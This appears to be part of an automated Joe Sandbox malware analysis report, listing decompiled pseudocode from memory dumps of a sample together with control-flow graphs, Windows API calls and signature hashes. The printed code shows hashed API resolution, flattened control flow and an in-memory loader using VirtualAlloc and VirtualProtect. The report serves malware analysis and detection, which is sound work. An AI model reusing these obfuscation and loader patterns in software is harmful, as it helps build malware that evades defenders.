                                                        								_t11 = E003F3E60(_t21, E003F3F00(0x9bab0b12), 0x5010a54d, _t53);
                                                        								 *0x3fdf30 = _t11;
                                                        							}
                                                        							return  *_t11(_t48, 0, _t51);
                                                        						} else {
                                                        							_t55 = _t2 - 0x185e9846;
                                                        							if(_t55 > 0) {
                                                        								__eflags = _t2 - 0x18843476;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									E003F7080(_t21, 0x3fd7a0, 4, __eflags);
                                                        									_t2 = 0x2eb73d4f;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t55 == 0) {
                                                        									E003F7080(_t21, 0x3fd8f0, 2, __eflags);
                                                        									_t2 = 0x9da2520;
                                                        									continue;
                                                        								} else {
                                                        									if(_t2 == 0x9da2520) {
                                                        										E003F7080(_t21, 0x3fd800, 3, __eflags);
                                                        										_t2 = 0x18843476;
                                                        										continue;
                                                        									} else {
                                                        										_t57 = _t2 - 0x15a7f569;
                                                        										if(_t2 != 0x15a7f569) {
                                                        											goto L21;
                                                        										} else {
                                                        											E003F7080(_t21, 0x3fd860, 0, _t57);
                                                        											_t2 = 0x39797244;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t2 - 0x2eb73d4f;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t2 - 0x39797244;
                                                        						if(__eflags != 0) {
                                                        							goto L21;
                                                        						} else {
                                                        							E003F7080(_t21, 0x3fd890, 1, __eflags);
                                                        							_t2 = 0x185e9846;
                                                        							goto L1;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							E003F7080(_t21, 0x3fd7e0, 5, __eflags);
                                                        							_t2 = 0x22a44863;
                                                        							goto L1;
                                                        						} else {
                                                        							__eflags = _t2 - 0x22a44863;
                                                        							if(__eflags == 0) {
                                                        								E003F7080(_t21, 0x3fd8c0, 6, __eflags);
                                                        								_t2 = 0x1a8031ec;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t2 - 0x291da748;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									_t2 = 0x15a7f569;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L21:
                                                        					__eflags = _t2 - 0x21acdd7e;
                                                        				} while (__eflags != 0);
                                                        				return _t2;
                                                        				goto L30;
                                                        			}














                                                        0x003f7120
                                                        0x003f7120
                                                        0x003f7120
                                                        0x003f7125
                                                        0x003f7125
                                                        0x003f7125
                                                        0x003f7125
                                                        0x003f712a
                                                        0x00000000
                                                        0x00000000
                                                        0x003f7130
                                                        0x003f723f
                                                        0x003f7246
                                                        0x003f7248
                                                        0x003f7260
                                                        0x003f7260
                                                        0x003f7266
                                                        0x003f7268
                                                        0x003f726e
                                                        0x003f7271
                                                        0x003f7276
                                                        0x003f7278
                                                        0x003f728b
                                                        0x003f7290
                                                        0x003f7290
                                                        0x003f7297
                                                        0x003f7299
                                                        0x003f729e
                                                        0x003f72a0
                                                        0x003f72b3
                                                        0x003f72b8
                                                        0x003f72b8
                                                        0x003f72c5
                                                        0x003f7136
                                                        0x003f7136
                                                        0x003f713b
                                                        0x003f7190
                                                        0x003f7195
                                                        0x00000000
                                                        0x003f719b
                                                        0x003f71a5
                                                        0x003f71aa
                                                        0x00000000
                                                        0x003f71aa
                                                        0x003f713d
                                                        0x003f713d
                                                        0x003f7184
                                                        0x003f7189
                                                        0x00000000
                                                        0x003f713f
                                                        0x003f7144
                                                        0x003f716e
                                                        0x003f7173
                                                        0x00000000
                                                        0x003f7146
                                                        0x003f7146
                                                        0x003f714b
                                                        0x00000000
                                                        0x003f7151
                                                        0x003f7158
                                                        0x003f715d
                                                        0x00000000
                                                        0x003f715d
                                                        0x003f714b
                                                        0x003f7144
                                                        0x003f713d
                                                        0x003f713b
                                                        0x00000000
                                                        0x003f7130
                                                        0x003f71b4
                                                        0x003f71b9
                                                        0x003f7207
                                                        0x003f720c
                                                        0x00000000
                                                        0x003f720e
                                                        0x003f7218
                                                        0x003f721d
                                                        0x00000000
                                                        0x003f721d
                                                        0x003f71bb
                                                        0x003f71bb
                                                        0x003f71f8
                                                        0x003f71fd
                                                        0x00000000
                                                        0x003f71bd
                                                        0x003f71bd
                                                        0x003f71c2
                                                        0x003f71df
                                                        0x003f71e4
                                                        0x00000000
                                                        0x003f71c4
                                                        0x003f71c4
                                                        0x003f71c9
                                                        0x00000000
                                                        0x003f71cb
                                                        0x003f71cb
                                                        0x00000000
                                                        0x003f71cb
                                                        0x003f71c9
                                                        0x003f71c2
                                                        0x003f71bb
                                                        0x00000000
                                                        0x003f7227
                                                        0x003f7227
                                                        0x003f7227
                                                        0x003f7232
                                                        0x00000000

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003F68AC), ref: 003F7266
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: Dry9$Dry9
                                                        • API String ID: 1029625771-121480178
                                                        • Opcode ID: baf57db966616d2f739d57fae6ee081cbb461133941d055ac0e28b5fbf084249
                                                        • Instruction ID: 525a276a30f7a05a3be519c598f07ce3c9293d0480ae968b5fea4d1f22422993
                                                        • Opcode Fuzzy Hash: baf57db966616d2f739d57fae6ee081cbb461133941d055ac0e28b5fbf084249
                                                        • Instruction Fuzzy Hash: BA31E720B0C20C43EA276FBA589577E11AFDBA0344F21442AF351CF795DD26CD05D396
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 786 3f4b70-3f4b80 787 3f4b9d-3f4bba 786->787 788 3f4b82-3f4b98 call 3f3f00 call 3f3e60 786->788 792 3f4bbc-3f4bd2 call 3f3f00 call 3f3e60 787->792 793 3f4bd7-3f4bf5 CreateProcessW 787->793 788->787 792->793 797 3f4bf7-3f4bfd 793->797 798 3f4c73-3f4c7a 793->798 800 3f4bff-3f4c13 797->800 801 3f4c14-3f4c1b 797->801 803 3f4c1d-3f4c33 call 3f3f00 call 3f3e60 801->803 804 3f4c38-3f4c45 801->804 803->804 810 3f4c47-3f4c5d call 3f3f00 call 3f3e60 804->810 811 3f4c62-3f4c72 804->811 810->811
                                                        C-Code - Quality: 60%
                                                        			E003F4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
                                                        				struct _STARTUPINFOW _v72;
                                                        				struct _PROCESS_INFORMATION _v88;
                                                        				intOrPtr* _t9;
                                                        				int _t12;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t17;
                                                        				WCHAR* _t44;
                                                        				WCHAR* _t45;
                                                        
                                                        				_t46 = __ebp;
                                                        				_t26 = __ebx;
                                                        				_t9 =  *0x3fddc0;
                                                        				_t45 = __edx;
                                                        				_t44 = __ecx;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E003F3E60(__ebx, E003F3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
                                                        					 *0x3fddc0 = _t9;
                                                        				}
                                                        				 *_t9( &_v72, 0, 0x44);
                                                        				_v72.cb = 0x44;
                                                        				if( *0x3fe21c == 0) {
                                                        					 *0x3fe21c = E003F3E60(_t26, E003F3F00(0x9bab0b12), 0xbd6cc871, _t46);
                                                        				}
                                                        				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
                                                        				if(_t12 == 0) {
                                                        					return 0;
                                                        				} else {
                                                        					if(_a12 == 0) {
                                                        						_t15 =  *0x3fde3c;
                                                        						if(_t15 == 0) {
                                                        							_t15 = E003F3E60(_t26, E003F3F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x3fde3c = _t15;
                                                        						}
                                                        						 *_t15(_v88.hProcess);
                                                        						_t17 =  *0x3fde3c;
                                                        						if(_t17 == 0) {
                                                        							_t17 = E003F3E60(_t26, E003F3F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x3fde3c = _t17;
                                                        						}
                                                        						 *_t17(_v88.hProcess);
                                                        						return 1;
                                                        					} else {
                                                        						asm("movdqu xmm0, [esp+0x8]");
                                                        						asm("movdqu [eax], xmm0");
                                                        						return 1;
                                                        					}
                                                        				}
                                                        			}











                                                        0x003f4b70
                                                        0x003f4b70
                                                        0x003f4b70
                                                        0x003f4b79
                                                        0x003f4b7c
                                                        0x003f4b80
                                                        0x003f4b93
                                                        0x003f4b98
                                                        0x003f4b98
                                                        0x003f4ba6
                                                        0x003f4bb0
                                                        0x003f4bba
                                                        0x003f4bd2
                                                        0x003f4bd2
                                                        0x003f4bf1
                                                        0x003f4bf5
                                                        0x003f4c7a
                                                        0x003f4bf7
                                                        0x003f4bfd
                                                        0x003f4c14
                                                        0x003f4c1b
                                                        0x003f4c2e
                                                        0x003f4c33
                                                        0x003f4c33
                                                        0x003f4c3c
                                                        0x003f4c3e
                                                        0x003f4c45
                                                        0x003f4c58
                                                        0x003f4c5d
                                                        0x003f4c5d
                                                        0x003f4c66
                                                        0x003f4c72
                                                        0x003f4bff
                                                        0x003f4bff
                                                        0x003f4c05
                                                        0x003f4c13
                                                        0x003f4c13
                                                        0x003f4bfd

                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 003F4BF1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: D$X~
                                                        • API String ID: 963392458-2090554203
                                                        • Opcode ID: c359135924040fa6db696f2f2e29556807c4b91ea953482987e5f63502774c89
                                                        • Instruction ID: 09354672ca69f08d80cd05df1ebfa8e5e3775c0afc7c5f33dd4ed38e7b6c6801
                                                        • Opcode Fuzzy Hash: c359135924040fa6db696f2f2e29556807c4b91ea953482987e5f63502774c89
                                                        • Instruction Fuzzy Hash: AA219F317403056BEB16AB7ADC41BBB3BAAAFE0704F10442CB654CF2A0FA74CD059751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 900 3f30a0-3f30b6 901 3f30ba-3f30bf 900->901 902 3f30c0-3f30c5 901->902 903 3f30cb 902->903 904 3f3201-3f3206 902->904 905 3f31ed-3f31f1 903->905 906 3f30d1-3f30d6 903->906 907 3f3208-3f320d 904->907 908 3f3245-3f324c 904->908 909 3f31f7-3f31fc 905->909 910 3f32f6-3f3300 905->910 911 3f30dc-3f30e1 906->911 912 3f31da-3f31e8 906->912 913 3f32ab-3f32b3 907->913 914 3f3213-3f3218 907->914 915 3f324e-3f3264 call 3f3f00 call 3f3e60 908->915 916 3f3269-3f3274 908->916 909->902 917 3f30e7-3f30ec 911->917 918 3f31a0-3f31a8 911->918 912->902 921 3f32b5-3f32cd call 3f3f00 call 3f3e60 913->921 922 3f32d3-3f32f3 913->922 919 3f322d-3f3232 914->919 920 3f321a-3f3228 call 3f3d00 914->920 915->916 935 3f3276-3f328c call 3f3f00 call 3f3e60 916->935 936 3f3291-3f329f RtlAllocateHeap 916->936 917->919 926 3f30f2-3f319b 917->926 928 3f31aa-3f31c2 call 3f3f00 call 3f3e60 918->928 929 3f31c8-3f31d5 918->929 919->902 930 3f3238-3f3242 919->930 920->901 921->922 922->910 926->901 928->929 929->901 935->936 936->910 943 3f32a1-3f32a6 936->943 943->901
                                                        C-Code - Quality: 71%
                                                        			E003F30A0() {
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t61;
                                                        				intOrPtr* _t62;
                                                        				void* _t65;
                                                        				intOrPtr _t93;
                                                        				intOrPtr* _t95;
                                                        				intOrPtr _t107;
                                                        				intOrPtr* _t116;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				intOrPtr _t129;
                                                        				signed int _t134;
                                                        				void* _t135;
                                                        				void* _t136;
                                                        
                                                        				_t93 =  *((intOrPtr*)(_t135 + 0xc));
                                                        				_t61 = 0x11f367c2;
                                                        				_t134 =  *(_t135 + 0x10);
                                                        				_t129 =  *((intOrPtr*)(_t135 + 0x14));
                                                        				_t127 =  *(_t135 + 0x18);
                                                        				while(1) {
                                                        					L1:
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t136 = _t61 - 0x12466c01;
                                                        							if(_t136 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t136 == 0) {
                                                        								if(_t93 !=  *(_t135 + 0x18)) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									_t61 = 0x2f21cdd2;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t61 == 0x7a26146) {
                                                        									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
                                                        									continue;
                                                        								} else {
                                                        									if(_t61 == 0x8928514) {
                                                        										_t95 =  *0x3fe1cc;
                                                        										if(_t95 == 0) {
                                                        											_t95 = E003F3E60(_t93, E003F3F00(0x55ab7d30), 0x815a9da3, _t134);
                                                        											 *0x3fe1cc = _t95;
                                                        										}
                                                        										_t129 =  *_t95(_t134 + 0x2c);
                                                        										_t61 = 0x39d78901;
                                                        										while(1) {
                                                        											L1:
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										if(_t61 != 0x11f367c2) {
                                                        											goto L18;
                                                        										} else {
                                                        											 *(_t135 + 0x18) = 0x2e7c;
                                                        											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
                                                        											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
                                                        											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
                                                        											 *(_t135 + 0x10) = 0xa461;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
                                                        											_t61 = 0x8928514;
                                                        											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
                                                        											while(1) {
                                                        												L1:
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L30:
                                                        						}
                                                        						if(_t61 == 0x2f21cdd2) {
                                                        							_t62 =  *0x3fe494;
                                                        							if(_t62 == 0) {
                                                        								_t62 = E003F3E60(_t93, E003F3F00(0x9bab0b12), 0x7facde30, _t134);
                                                        								 *0x3fe494 = _t62;
                                                        							}
                                                        							_t128 =  *_t62();
                                                        							if( *0x3fdd18 == 0) {
                                                        								 *0x3fdd18 = E003F3E60(_t93, E003F3F00(0x9bab0b12), 0x9ff0609c, _t134);
                                                        							}
                                                        							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
                                                        							_t127 = _t65;
                                                        							if(_t127 == 0) {
                                                        								goto L29;
                                                        							} else {
                                                        								_t61 = 0x35eaa088;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							if(_t61 == 0x35eaa088) {
                                                        								_t116 =  *0x3fe43c;
                                                        								if(_t116 == 0) {
                                                        									_t116 = E003F3E60(_t93, E003F3F00(0x9bab0b12), 0x2df4d385, _t134);
                                                        									 *0x3fe43c = _t116;
                                                        								}
                                                        								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
                                                        								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
                                                        								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
                                                        								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
                                                        								 *(_t107 + 0x1c) = _t127;
                                                        								goto L29;
                                                        							} else {
                                                        								if(_t61 != 0x39d78901) {
                                                        									goto L18;
                                                        								} else {
                                                        									_t93 = E003F3D00(_t129);
                                                        									_t61 = 0x7a26146;
                                                        									while(1) {
                                                        										L1:
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L30;
                                                        						L18:
                                                        					} while (_t61 != 0x100ad7b4);
                                                        					return 1;
                                                        					goto L30;
                                                        				}
                                                        			}



















                                                        0x003f30a2
                                                        0x003f30a6
                                                        0x003f30ac
                                                        0x003f30b1
                                                        0x003f30b6
                                                        0x003f30ba
                                                        0x003f30ba
                                                        0x003f30c0
                                                        0x003f30c0
                                                        0x003f30c0
                                                        0x003f30c0
                                                        0x003f30c5
                                                        0x00000000
                                                        0x00000000
                                                        0x003f30cb
                                                        0x003f31f1
                                                        0x003f32f9
                                                        0x003f3300
                                                        0x003f31f7
                                                        0x003f31f7
                                                        0x00000000
                                                        0x003f31f7
                                                        0x003f30d1
                                                        0x003f30d6
                                                        0x003f31e5
                                                        0x00000000
                                                        0x003f30dc
                                                        0x003f30e1
                                                        0x003f31a0
                                                        0x003f31a8
                                                        0x003f31c0
                                                        0x003f31c2
                                                        0x003f31c2
                                                        0x003f31ce
                                                        0x003f31d0
                                                        0x003f30ba
                                                        0x003f30ba
                                                        0x00000000
                                                        0x003f30ba
                                                        0x003f30e7
                                                        0x003f30ec
                                                        0x00000000
                                                        0x003f30f2
                                                        0x003f30f2
                                                        0x003f310d
                                                        0x003f3111
                                                        0x003f311f
                                                        0x003f3123
                                                        0x003f3130
                                                        0x003f3139
                                                        0x003f3147
                                                        0x003f314b
                                                        0x003f3153
                                                        0x003f315b
                                                        0x003f3175
                                                        0x003f317f
                                                        0x003f3187
                                                        0x003f318b
                                                        0x003f3193
                                                        0x003f30ba
                                                        0x003f30ba
                                                        0x00000000
                                                        0x003f30ba
                                                        0x003f30ba
                                                        0x003f30ec
                                                        0x003f30e1
                                                        0x003f30d6
                                                        0x00000000
                                                        0x003f30cb
                                                        0x003f3206
                                                        0x003f3245
                                                        0x003f324c
                                                        0x003f325f
                                                        0x003f3264
                                                        0x003f3264
                                                        0x003f326b
                                                        0x003f3274
                                                        0x003f328c
                                                        0x003f328c
                                                        0x003f3299
                                                        0x003f329b
                                                        0x003f329f
                                                        0x00000000
                                                        0x003f32a1
                                                        0x003f32a1
                                                        0x00000000
                                                        0x003f32a1
                                                        0x003f3208
                                                        0x003f320d
                                                        0x003f32ab
                                                        0x003f32b3
                                                        0x003f32cb
                                                        0x003f32cd
                                                        0x003f32cd
                                                        0x003f32e4
                                                        0x003f32e6
                                                        0x003f32ed
                                                        0x003f32f0
                                                        0x003f32f3
                                                        0x00000000
                                                        0x003f3213
                                                        0x003f3218
                                                        0x00000000
                                                        0x003f321a
                                                        0x003f3221
                                                        0x003f3223
                                                        0x003f30ba
                                                        0x003f30ba
                                                        0x00000000
                                                        0x003f30ba
                                                        0x003f30ba
                                                        0x003f3218
                                                        0x003f320d
                                                        0x00000000
                                                        0x003f322d
                                                        0x003f322d
                                                        0x003f3242
                                                        0x00000000
                                                        0x003f3242

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 003F3299
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: |.
                                                        • API String ID: 1279760036-512043466
                                                        • Opcode ID: c5d0d8a11311ea563877a72a17589b4754fc9b8aa20d7300f8cd1f373ad8066f
                                                        • Instruction ID: b45a41e718a714cf0327172100930bb900fc094b0e9994e114a8e249a138ec35
                                                        • Opcode Fuzzy Hash: c5d0d8a11311ea563877a72a17589b4754fc9b8aa20d7300f8cd1f373ad8066f
                                                        • Instruction Fuzzy Hash: 4851907160830A8B8719DF6CC48557ABBEAEBD4344F20482EF651CB365DB31DA498792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 951 3e0580-3e05be call 3e0ed0 954 3e05d2-3e05da 951->954 955 3e05c0-3e05cf 951->955 956 3e06e7-3e06ef 954->956 957 3e05e0-3e05e3 954->957 957->956 958 3e05e9-3e05eb 957->958 958->956 959 3e05f1-3e05fc 958->959 959->956 961 3e0602-3e0607 959->961 962 3e060d-3e0629 call 3e1140 RtlMoveMemory 961->962 963 3e06d8-3e06e4 961->963 966 3e062b-3e0630 962->966 967 3e0654-3e0659 962->967 968 3e0632-3e0641 966->968 969 3e0643-3e0652 966->969 970 3e066c-3e0678 967->970 971 3e065b-3e066a 967->971 972 3e0679-3e0699 call 3e1140 968->972 969->972 970->972 971->972 972->956 975 3e069b-3e06a3 VirtualProtect 972->975 976 3e06c6-3e06d5 975->976 977 3e06a5-3e06a8 975->977 977->956 978 3e06aa-3e06ad 977->978 978->956 979 3e06af-3e06b1 978->979 979->962 980 3e06b7-3e06c3 979->980
                                                        APIs
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003E0F08
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003E0F3E
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003E0F7F
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 003E061B
                                                        • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 003E069C
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256690931.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3e0000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 4043890290-0
                                                        • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction ID: ffba8ccbbd9fcb5dec0ba7b2b32c3c26793916692908a94162ee525f51d0a3ed
                                                        • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction Fuzzy Hash: 1C317AB36542A157E3299767DC45BFBA3C4D7D1350F080A3AF904C62C0D1BED5D8C265
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 981 3f5ce0-3f5cec call 3f65e0 984 3f5cee-3f5d04 call 3f3f00 call 3f3e60 981->984 985 3f5d09-3f5d0d ExitProcess 981->985 984->985
                                                        C-Code - Quality: 100%
                                                        			_entry_() {
                                                        				void* _t5;
                                                        				void* _t9;
                                                        
                                                        				E003F65E0();
                                                        				if( *0x3fddb8 == 0) {
                                                        					 *0x3fddb8 = E003F3E60(_t5, E003F3F00(0x9bab0b12), 0x89f3d704, _t9);
                                                        				}
                                                        				ExitProcess(0);
                                                        			}





                                                        0x003f5ce0
                                                        0x003f5cec
                                                        0x003f5d04
                                                        0x003f5d04
                                                        0x003f5d0b

                                                        APIs
                                                        • ExitProcess.KERNELBASE(00000000), ref: 003F5D0B
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 4b9cbb52d200e65bb2084253a5a046b8fbe3cb2d9c355f5fcca5bda765f27969
                                                        • Instruction ID: 964127c1f92f1587733b1350e424ba07ce296c62fbcbd644b1b80bf2ba2803c0
                                                        • Opcode Fuzzy Hash: 4b9cbb52d200e65bb2084253a5a046b8fbe3cb2d9c355f5fcca5bda765f27969
                                                        • Instruction Fuzzy Hash: C5D0C96175420846DA46ABB5584A77A259B4FA0748F104019F215CF2AAEE248910A350
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 990 3e0ad0-3e0b31 call 3e0ed0 993 3e0b47-3e0b4d 990->993 994 3e0b33-3e0b42 990->994 996 3e0b5f-3e0b7b 993->996 997 3e0b4f-3e0b54 993->997 995 3e0d40 994->995 999 3e0b7d-3e0b8e 996->999 1000 3e0b90 996->1000 997->996 1001 3e0b96-3e0b9c 999->1001 1000->1001 1003 3e0bae-3e0bca 1001->1003 1004 3e0b9e-3e0ba3 1001->1004 1006 3e0bcc-3e0bd4 1003->1006 1007 3e0bd7-3e0c21 VirtualAlloc 1003->1007 1004->1003 1006->1007 1011 3e0d1a-3e0d24 1007->1011 1012 3e0c27-3e0c2e 1007->1012 1011->995 1013 3e0c44-3e0c4b 1012->1013 1014 3e0c30-3e0c3f 1012->1014 1015 3e0c5d-3e0c79 1013->1015 1016 3e0c4d-3e0c52 1013->1016 1014->995 1018 3e0c7b-3e0c83 1015->1018 1019 3e0c86-3e0c8d 1015->1019 1016->1015 1018->1019 1020 3e0c9f-3e0cbb 1019->1020 1021 3e0c8f-3e0c94 1019->1021 1023 3e0cbd-3e0cc5 1020->1023 1024 3e0cc8-3e0cfa VirtualAlloc 1020->1024 1021->1020 1023->1024 1027 3e0d02-3e0d07 1024->1027 1027->1011 1028 3e0d09-3e0d18 1027->1028 1028->995
                                                        APIs
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003E0F08
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003E0F3E
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003E0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000), ref: 003E0BFF
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256690931.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3e0000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$AllocVirtual
                                                        • String ID:
                                                        • API String ID: 1654584625-0
                                                        • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction ID: 76fb393f45db58fdc3be3246e40eed9638cc4d7e9b08953bb03511972d8a8551
                                                        • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction Fuzzy Hash: B7512470640268ABDB248B55CE45FEAB7B8EF54700F104294FA08BB1D0D6F89DC5CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
